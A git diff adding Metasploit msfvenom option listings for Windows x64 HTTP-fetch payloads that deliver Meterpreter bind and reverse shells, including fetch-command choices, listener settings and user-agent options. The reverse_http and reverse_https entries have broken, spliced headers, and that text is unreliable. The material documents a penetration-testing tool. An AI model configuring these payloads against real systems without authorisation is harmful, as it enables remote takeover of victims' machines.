-0,0 +1,92 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + UserExistsError + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME pwnOSTTpRsVU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt new file mode 100644 index 0000000..4f92db2 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt @@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VdDtuESgABAW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..bb03c6c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_http + Platform: Windows + Arch: cmd +Needs Admin: N +Evasion options for payload/cmd/windows/http/x64/meterpreter_reverse_http: +========================= + +fewer@harmonysecurity.com> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LAeKqxIP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..bbe47a0 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_https + Platform: Windows + Arch: cmd +Needs Admin: N +Evasion options for payload/cmd/windows/http/x64/meterpreter_reverse_https: +========================= + +ewer@harmonysecurity.com> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME uJYCZdpzUkY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..d10d9db --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME iAdOMBhzlNL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no The IPv6 Scope ID, required for link-layer addresses + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..eb43fb4 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt @@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64 + Module: payload/cmd/windows/http/x64/meterpreter_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME JJIfTrrFVG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt new file mode 100644 index 0000000..844a157 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, 